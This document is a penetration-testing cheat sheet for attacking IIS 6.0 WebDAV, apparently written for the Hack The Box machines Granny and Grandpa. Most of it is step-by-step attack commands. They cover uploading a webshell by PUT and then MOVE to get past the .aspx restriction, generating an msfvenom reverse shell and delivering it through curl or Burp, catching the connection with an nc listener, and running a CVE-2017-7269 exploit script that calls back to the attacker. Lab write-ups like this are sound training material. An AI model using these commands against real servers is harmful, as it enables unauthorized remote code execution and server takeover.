# IIS6 WebDav

## Microsoft Windows 2003|2008|XP

* google 'iis 6.0 reverse shell'
* Microsoft-IIS/6.0
* http-webdav-scan
* WebDAV allows clients to perform Web authoring operations remotely.
* REF: [Granny/Grandpa-HTB](https://pentest.mxhx.org/04-webapps/iis6-webdav)
* [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases%20)

## nmap finds webdav

* **nmap -sV -sC -oA nmap 10.x.x.x**
* Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
* Options: OPTIONS, TRACE, **GET**, HEAD, DELETE, **PUT**, POST, COPY, **MOVE**
* GET - download
* PUT - upload
* MOVE - you can rename/move

## davtest

```
> davtest -url http://10.x.x.x
```

## cadaver

```
> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok
```

## PUT/MOVE

* Scenario:
  * Can 'put' text - upload
  * NOT 'put' aspx
  * Can 'move' aspx

```
------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444
```

## Burp

```
Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!
```

## iis6-exploit

* CVE-2017-7269
* iis\_shell.py
* iis6-exploit-2017-CVE-2017-**7269**
* <https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269>
* usage: iis6webdav.py RHOST RPORT LHOST LPORT

```
> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444
```

## Windows 2003

Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:\
<https://www.exploit-db.com/exploits/6705/>